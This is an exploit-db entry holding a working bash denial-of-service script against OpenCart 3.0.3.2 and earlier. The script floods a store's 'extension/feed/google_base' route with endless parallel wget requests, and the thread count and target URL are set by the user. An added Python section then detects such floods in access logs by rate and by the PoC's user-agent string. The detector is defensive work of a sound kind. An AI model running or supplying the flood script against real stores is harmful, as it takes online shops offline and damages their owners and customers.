Opencart 3.0.3.2 – ‘extension/feed/google_base’ Denial of Service (PoC)

  • Author: Todor Donev
    Date: 2019-05-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46921/

    #!/bin/bash
    #
    #Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit
    #
    #Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
    #
    #PoC exploit, just for test...
    #Tested on store with added more than 1000 products
    #Usage: ./cartkiller.sh store_url threads sleep
    #Example: ./cartkiller.sh https://store_name 50 5
    #
    #
    #Disclaimer:
    #This or previous programs is for Educational 
    #purpose ONLY. Do not use it without permission. 
    #The usual disclaimer applies, especially the 
    #fact that Todor Donev is not liable for any 
    #damages caused by direct or indirect use of the 
    #information or functionality provided by these 
    #programs. The author or any Internet provider 
    #bears NO responsibility for content or misuse 
    #of these programs or any derivatives thereof.
    #By using these programs you accept the fact 
    #that any damage (dataloss, system crash, 
    #system compromise, etc.) caused by the use 
    #of these programs is not Todor Donev's 
    #responsibility.
    # 
    #Use them at your own risk!
    #
    
    echo "Opencart <= 3.0.3.2 'extension/feed/google_base' Remote Denial of Service PoC exploit"
    echo
    echo "Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>"
    echo
    echo "PoC exploit, just for test..."
    echo "Tested on store with added more than 1000 products"
    
    if [ -z "$3" ]; then
        echo Usage: "$0" store_url threads sleep
        echo Example: "$0" https://store_name 50 5
        exit 4
    fi

    url="$1"
    threads="$2"
    sleep="$3"
    while :
    do
        for ((i=1;i<=threads;i++));
        do
            wget "$url/index.php?route=extension/feed/google_base" --user-agent="Mozilla/5.0 (OpenCart Killer v2 google_base Denial Of Service)" --quiet -O /dev/null -o /dev/null &
        done
        #
        # Sleep between loops..
        #
        sleep "$sleep"
    done
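
For defenders, the traffic this PoC generates is easy to spot in web server access logs: many requests from one client to the `extension/feed/google_base` route in a short window. The following detection sketch is an added example, not part of the original exploit-db entry; it assumes Combined Log Format, and the thresholds, function names and sample log lines (documentation IP ranges) are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

FEED_ROUTE = "extension/feed/google_base"   # route requested by the PoC above
POC_UA = "Mozilla/5.0 (OpenCart Killer v2 google_base Denial Of Service)"  # from the PoC
POC_UA_MARKER = "OpenCart Killer"           # trivially changed, so only a secondary signal

# Combined Log Format is assumed; adjust the pattern to your server's log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def find_feed_floods(lines, threshold=20, window_seconds=10):
    """Return {ip: [reasons]} for clients hammering the google_base feed."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> timestamps of feed hits inside the window
    findings = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes, so route=extension%2Ffeed%2Fgoogle_base also matches.
        query = parse_qs(urlsplit(m["target"]).query)
        if FEED_ROUTE not in query.get("route", []):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits = recent[m["ip"]]
        hits.append(ts)
        while ts - hits[0] > window:      # drop hits that fell out of the window
            hits.popleft()
        if len(hits) >= threshold:
            findings[m["ip"]].add("rate")
        if POC_UA_MARKER in m["ua"]:
            findings[m["ip"]].add("poc-user-agent")
    return {ip: sorted(reasons) for ip, reasons in findings.items()}

def _sample(ip, second, ua, route=FEED_ROUTE):
    # Constructed log line for the demo data below; not taken from a real server.
    return (f'{ip} - - [24/May/2019:10:00:{second:02d} +0000] '
            f'"GET /index.php?route={route} HTTP/1.1" 200 512 "-" "{ua}"')

SAMPLE_LOG = (
    [_sample("203.0.113.7", s // 10, POC_UA) for s in range(50)]   # PoC-like burst
    + [_sample("198.51.100.9", 3, "Googlebot/2.1")]                # single legitimate fetch
    + [_sample("192.0.2.4", s // 10, "curl/8.0", "product/product") for s in range(50)]
)
```

`find_feed_floods(SAMPLE_LOG)` flags only `203.0.113.7`. The same per-client rate is what a reverse-proxy rate limit on the feed route, or caching of the generated feed, would bound.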